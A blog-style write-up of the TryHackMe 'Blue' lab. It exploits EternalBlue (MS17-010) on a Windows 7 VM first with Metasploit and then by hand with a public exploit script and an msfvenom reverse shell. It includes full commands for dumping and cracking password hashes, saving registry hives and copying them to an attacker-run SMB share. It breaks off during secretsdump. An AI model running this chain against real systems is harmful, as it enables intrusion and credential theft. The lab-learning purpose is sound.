Blue Boot2Root Write-Up

Nate Catelli
A boot2root writeup of the Blue host from TryHackMe
November 11, 2020
ctfboot2roothackingwriteuptryhackme

Introduction:

After participating in the Disney Can-You-Hack-It CTF, I’ve been trying to spend more of my time studying security and offensive penetration testing. My main goal is to balance understanding how to effectively perform an attack with the awesome frameworks out there like metasploit while gaining a better understanding of what this framework is doing under the hood. This post is the first of many that will follow me documenting both the attacks and my methodologies.

Environment

Both attacks take place in a flat network consisting of my attack host, which is a freshly-booted Kali Linux livecd, and the the target host, a freshly-booted Windows VM that I knew contained 3 flags to capture. No other information is known about the host, like what it’s running or its OS version, but I would be lying if I said I didn’t assume that this would be an eternalblue attack based off the name.

Attacking Blue with Metasploit

I started the attack by opening a tmux session and starting meterpreter with msfdb run to spin up a postgres instance for persisting scans and recon data.

Host enumeration

Given that I was investigating a single host, and that I had an unfair suspicion of what kind of attack vector I would be looking for, I started with a default script and service version scan.

msf5 > db_nmap -sV -sC -Pn 10.10.201.83
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:53 UTC
[*] Nmap: Nmap scan report for ip-10-10-201-83.eu-west-1.compute.internal (10.10.201.83)
[*] Nmap: Host is up (0.00053s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 135/tcp   open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)n  tcpwrapped
[*] Nmap: |_ssl-date: 2020-11-11T01:55:05+00:00; 0s from scanner time.
[*] Nmap: 49152/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49160/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: MAC Address: 02:B5:23:84:9D:19 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: |_clock-skew: mean: 1h29m59s, deviation: 3h00m00s, median: 0s
[*] Nmap: |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:b5:23:84:9d:19 (unknown)mb-os-discovery:
[*] Nmap: |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
[*] Nmap: |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
[*] Nmap: |   Computer name: Jon-PC
[*] Nmap: |   NetBIOS computer name: JON-PC\x00
[*] Nmap: |   Workgroup: WORKGROUP\x00
[*] Nmap: |_  System time: 2020-11-10T19:54:50-06:00
[*] Nmap: | smb-security-mode:
[*] Nmap: |   account_used: guest
[*] Nmap: |   authentication_level: user
[*] Nmap: |   challenge_response: supported
[*] Nmap: |_  message_signing: disabled (dangerous, but default)
[*] Nmap: | smb2-security-mode:
[*] Nmap: |   2.02:
[*] Nmap: |_    Message signing enabled but not required
[*] Nmap: | smb2-time:
[*] Nmap: |   date: 2020-11-11T01:54:50
[*] Nmap: |_  start_date: 2020-11-11T01:51:00
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 140.63 seconds

This initial scan began to confirm my suspicions that this was an eternalblue attack since it looked like the host was a Windows 7 Service Pack 1 machine with SMB available. In addition, this ended up leaking a potential username as the computer’s name, which was worth keeping in mind as a potential administrative user going forward. Additionally this pointed out relaxed security setting in the smb service’s configuration.

With the information I collected so far, I decided to probe a little further into SMB with an enumaration using nmap’s smb-enum-shares scripts.

msf5 > db_nmap --script smb-enum-shares  -p 445 10.10.201.83
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:58 UTC
[*] Nmap: Nmap scan report for ip-10-10-201-83.eu-west-1.compute.internal (10.10.201.83)
[*] Nmap: Host is up (0.00020s latency).
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: MAC Address: 02:B5:23:84:9D:19 (Unknown)
[*] Nmap: Host script results:
[*] Nmap: | smb-enum-shares:
[*] Nmap: |   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED) |   account_used: <blank>
[*] Nmap: |   \\10.10.201.83\ADMIN$:
[*] Nmap: |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
[*] Nmap: |     Anonymous access: <none>
[*] Nmap: |   \\10.10.201.83\C$:
[*] Nmap: |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
[*] Nmap: |     Anonymous access: <none>
[*] Nmap: |   \\10.10.201.83\IPC$:
[*] Nmap: |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_    Anonymous access: READ
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds

This indicated anonymous read access on the IPC share, another piece of evidence pointing to eternalblue as being the attack vector. With this information, I decided I should kick off a quick vuln scan with nmap to see if it would infact identify eternalblue. Which it quickly did, as ms17-010.

msf5 > db_nmap --script vuln  -p 445 10.10.201.83
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:03 UTC
[*] Nmap: Nmap scan report for ip-10-10-201-83.eu-west-1.compute.internal (10.10.201.83)
[*] Nmap: Host is up (0.00046s latency).
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: |_clamav-exec: ERROR: Script execution failed (use -d to debug)
[*] Nmap: MAC Address: 02:B5:23:84:9D:19 (Unknown)
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: |        servers (ms17-010).
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |     References:
[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds

I now had a potential attack vector to explore, but I decided to do a quick recap of the services on the host to make sure I didn’t miss anything. This was crucial because I had overlooked an open RDP port, which ended up being important later in the attack.

msf5 > services 
Services
========

host          port   proto  name           state  info
----          ----   -----  ----           -----  ----
10.10.201.83  135    tcp    msrpc          open   Microsoft Windows RPC
10.10.201.83  139    tcp    netbios-ssn    open   Microsoft Windows netbios-ssn
10.10.201.83  445    tcp    microsoft-ds   open   Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.201.83  3389   tcp    ms-wbt-server  open   
10.10.201.83  49152  tcp    unknown        open   Microsoft Windows RPC
10.10.201.83  49153  tcp    unknown        open   Microsoft Windows RPC
10.10.201.83  49154  tcp    unknown        open   Microsoft Windows RPC
10.10.201.83  49158  tcp    unknown        open   Microsoft Windows RPC
10.10.201.83  49160  tcp    unknown        open   Microsoft Windows RPC

Preparing the attack

The first step was to check if there were any exploits available for ms17-010

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

Since previous scans pointed to the target OS being windows 7, the second option in the list seemed like a perfect candidate.

msf5 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > setg RHOSTS 10.10.201.83
RHOSTS => 10.10.201.83
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.201.83     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.100.83     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

I left the default payload as the staged reverse TCP shell, and kicked off an attack to see if I could get a shell.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.100.83:4444 
[*] 10.10.201.83:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.201.83:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.201.83:445      - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.201.83:445 - Connecting to target for exploitation.
[+] 10.10.201.83:445 - Connection established for exploitation.
[+] 10.10.201.83:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.201.83:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.201.83:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.201.83:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.201.83:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.201.83:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.201.83:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.201.83:445 - Sending all but last fragment of exploit packet
[*] 10.10.201.83:445 - Starting non-paged pool grooming
[+] 10.10.201.83:445 - Sending SMBv2 buffers
[+] 10.10.201.83:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.201.83:445 - Sending final SMBv2 buffers.
[*] 10.10.201.83:445 - Sending last fragment of exploit packet!
[*] 10.10.201.83:445 - Receiving response from exploit packet
[+] 10.10.201.83:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.201.83:445 - Sending egg to corrupted connection.
[*] 10.10.201.83:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.201.83
[*] Meterpreter session 1 opened (10.10.100.83:4444 -> 10.10.201.83:49198) at 2020-11-11 02:08:15 +0000
[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

SUCCESS! And it left me with NT AUTHORITY\SYSTEM credentials. At this point the machine was mine, but I had to make sure that I had a stable foothold on the machine before proceeding to search for flags.

Foothold

The first step was making sure my shell on the host was stable. So I checked my pid and looked to see if I could migrate it to something like the print spooler.

meterpreter > getpid 
Current pid: 1304
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 492   708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 560   552   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.execorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe    NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exes.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exenlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.execes.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exem.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exesvchost.exe           x64   0        NT AUTHORITY\SYSTEM           
 900   708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 948   708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1016  660   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exeost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1172  708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 1304  708   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1340  708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 1408  708   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1480  708   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 1616  708   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1956  708   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  
 2060  708   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           
 2072  832   WmiPrvSE.exe                                                       
 2184  708   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    
 2220  708   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2496  708   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           
 2548  708   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  
 2956  708   vds.exe               x64   0        NT AUTHORITY\SYSTEM           
 2996  708   svchost.exe           x64   0        NT AUTHORITY\SYSTEM

Luckily for me it already looked like it was in the injected in the spool service so there was no need to proceed with a migration.

Even though I already knew where this host was running from deploying it, the ps output also established that this host was an EC2 instance via the ssm-agent, LiteAgent and Ec2Config processes. This could have also been observed in the nmap scans via the reverse dns lookup, but I thought it was worth calling out.

Confirmed again with a quick run of the post/windows/gather/checkvm module.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if JON-PC is a Virtual Machine ...
[+] This is a Xen Virtual Machine

Finally I grabbed a sysinfo output to confirm a bunch of information that I had already assumed or known.

meterpreter > sysinfo 
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

With all this information, I attempted to grab a hashdump to pivot from this shell to a longer-lived user.

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

And of course, there is Jon. With our hashes and users, I dumped these credentials into a file and ran john against it with Kali’s copy of the rockyou.txt password list.

root@kali:~/ctf/blue# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2020-11-11 02:23) 3.076g/s 15692Kp/s 15692Kc/s 15700KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

With the Jon user’s password in hand, I ran the post/windows/manage/enable_rdp module and was quickly able to connect as the our Jon admin user.

meterpreter > run post/windows/manage/enable_rdp 

[*] Enabling Remote Desktop
[*]   RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]   The Terminal Services service is not set to auto, changing it to auto ...
[*]   Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201111022704_default_10.10.201.83_host.windows.cle_997445.txt

Wrapping up

With a new shell I was able to find each of the 3 flags in fairly standard locations on the C:\ drive.

Attacking Blue without Metasploit

Now that I had completed the initial attack, I wanted to retry it without the help of metasploit for sourcing, packing and executing the exploit. This imposed the restriction of not having the meterpreter shell to rely on.

Even though I now understood the attack and the host I decided to run through the motions of host enumeration again. For the sake of brevity, I’ll avoid repeating some of the callouts unless there are differences with the first attack.

I started with the same nmap scan, the only difference being that I instead supplied -oA $ATTACKTARGET to output the results to the host with the target server’s ip as a prefix. This functioned to make up for not having the results automatically persisted in msfdb.

root@kali:~/ctf/scans# export ATTACKTARGET=10.10.87.38
root@kali:~/ctf/scans# nmap -sV -sC -oA $ATTACKTARGET $ATTACKTARGET 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:45 UTC
Nmap scan report for ip-10-10-87-38.eu-west-1.compute.internal (10.10.87.38)
Host is up (0.00036s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2020-11-11T02:47:18+00:00; 0s from scanner time.
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49158/tcp open  msrpc          Microsoft Windows RPC
49160/tcp open  msrpc          Microsoft Windows RPC
MAC Address: 02:FF:5C:EF:7E:F3 (Unknown)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h30m00s, deviation: 3h00m00s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ff:5c:ef:7e:f3 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-10T20:47:13-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-11T02:47:13
|_  start_date: 2020-11-11T02:35:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.72 seconds
root@kali:~/ctf/scans# nmap --script smb-enum-shares,smb-enum-users -p 445 -oA "$ATTACKTARGET_smb_enum" $ATTACKTARGET 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:52 UTC
Nmap scan report for ip-10-10-87-38.eu-west-1.compute.internal (10.10.87.38)
Host is up (0.00077s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:FF:5C:EF:7E:F3 (Unknown)

Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\10.10.87.38\ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.87.38\C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.87.38\IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 2.80 seconds
root@kali:~/ctf/scans# nmap --script vuln -p 445 -oA "$ATTACKTARGET_smb_vuln" $ATTACKTARGET 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:53 UTC
Nmap scan report for ip-10-10-87-38.eu-west-1.compute.internal (10.10.87.38)
Host is up (0.0011s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:FF:5C:EF:7E:F3 (Unknown)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds

Once agaiin, the scans lead to the same conclusion that the host is vulnerable to eternalblue. So the next step was to hop on google and exploitdb to start looking for an exploit.

Preparing the attack

The first result that turned up was an exploit from Sleepya Microsoft Windows 7/2008 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010) , whereas google pointed me to worawit/MS17-010. Upon further inspection, they looked to like the same exploit, but the worawit link provided shellcode that could be used as the basis for a payload.

Looking deeper into the eternalblue_kshellcode_x64.asm shellcode, it looked like the shellcode expected a user payload to be appended to the end of the binary both of which still needed to be prepared.

userland_start:
userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret
    
userland_payload:

With all this in mind, I then pulled down the python exploit script and shellcode and assembled the latter with nasm as a flat binary. Then I generated an unstaged tcp reverse shell for windows as a payload, also a flat binary, and joined the contents contents into a single sc_joined.bin payload. One pointless thing to note is I added an arbitrary nop sled to the payload. This could have been left out.

root@kali:~/ctf/scans# cd ../
root@kali:~/ctf# mkdir exploits && cd exploits
root@kali:~/ctf/exploits# curl -o 42031.py https://www.exploit-db.com/raw/42031
root@kali:~/ctf/exploits# curl -sO https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x64.asm
root@kali:~/ctf/exploits# nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
root@kali:~/ctf/exploits# msfvenom -p windows/x64/shell_reverse_tcp -a x64 --platform windows -f raw -n100 LPORT=443 LHOST=10.10.47.175 > reverse.bin
No encoder specified, outputting raw payload
Successfully added NOP sled of size 100 from x64/simple
Payload size: 560 bytes
root@kali:~/ctf/exploits# ls
42031.py  eternalblue_kshellcode_x64.asm  reverse.bin  sc_joined.bin  sc_x64_kernel.bin
root@kali:~/ctf/exploits# cat sc_x64_kernel.bin reverse.bin > sc_joined.bin 

Attacking

To prepare to catch the reverse shell, I started a netcat listener on port 443 in a new terminal. Then I returned to the original to install the single required python dependency impacket and kick off the attack.

root@kali:~# nc -lvnp 443
listening on [any] 443 ...
root@kali:~/ctf/exploits# pip2 install impacket
... 
root@kali:~/ctf/exploits# python2 42031.py $ATTACKTARGET sc_joined.bin 20
shellcode size: 1332
numGroomConn: 20
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

I switched back to our open netcat process to confirm the success of the attack and was happy to find a Windows shell prompt.

root@kali:~# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.47.175] from (UNKNOWN) [10.10.87.38] 49170
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Foothold

Unlike the first attack I knew this windows shell was extremely limited, so my first priority was to try to egress credentials so that I could escalate to a more stable point of access.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    Jon                      
The command completed with one or more errors.


C:\Windows\system32>cd ../../
cd ../../

C:\>reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\sam C:\sam.save
The operation completed successfully.

C:\>reg.exe save hklm\security C:\security.save
reg.exe save hklm\security C:\security.save
The operation completed successfully.

C:\>reg.exe save hklm\system c:\system.save
reg.exe save hklm\system C:\system.save
The operation completed successfully.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E611-0B66

 Directory of C:\

03/17/2019  01:27 PM                24 flag1.txt
07/13/2009  09:20 PM    <DIR>          PerfLogs
04/12/2011  02:28 AM    <DIR>          Program Files
03/17/2019  04:28 PM    <DIR>          Program Files (x86)
11/10/2020  10:18 PM            24,576 sam.save
11/10/2020  10:18 PM            24,576 security.save
11/10/2020  10:19 PM        12,353,536 system.save
12/12/2018  09:13 PM    <DIR>          Users
03/17/2019  04:36 PM    <DIR>          Windows
               4 File(s)     12,402,712 bytes
               5 Dir(s)  20,753,133,568 bytes free

C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}
C:\>

The first step was identifying the local users and attempting to dump some crucial registers that I could attack offline. While doing this I happened to dump these registry hives to the root of the C:\ drive which happened to point out the first flag flag{access_the_machine}. In hindsight this was probably a poor choice of location as it would be much more likely to be caught here than in other locations.

Now that I had the hives dumped on disk I still needed to figure out how to egress them to my local machine for further attack. This lead me to reference an example from ropnop’s blog pointing me towards the impacket-smbserver which comes preinstalled on Kali. I could interact with SMB from the cmd shell with out the need for an interactive shell or any other tools.

root@kali:~/# mkdir -p ctf/extractor && cd ctf/extractor

root@kali:~/ctf/extractor# impacket-smbserver BLUE $PWD
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

root@kali:~# netstat -plunt | grep 445
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      1428/python3

From the target host I was now able to validate that I could see and connect to the newly started share and promptly copied the hives back to my attack machine.

C:\>net view \\10.10.47.175
net view \\10.10.47.175
Shared resources at \\10.10.47.175

(null)

Share name  Type  Used as  Comment  

-------------------------------------------------------------------------------
BLUE        Disk                    
The command completed successfully.


C:\>copy C:\sam.save \\10.10.47.175\BLUE\sam.save
copy C:\sam.save \\10.10.47.175\BLUE\sam.save
        1 file(s) copied.

C:\>copy C:\security.save \\10.10.47.175\BLUE\security.save
copy C:\security.save \\10.10.47.175\BLUE\security.save
        1 file(s) copied.

C:\>copy C:\system.save \\10.10.47.175\BLUE\system.save
copy C:\system.save \\10.10.47.175\BLUE\system.save
        1 file(s) copied.

With these credentials now available locally, I could extract the user hashes using secretsdump from impacket and perform the same attack with john that I had performed before.

root@kali:~/ctf/extractor# impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x55bd17830e678f18a3110daf2c17d4c7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
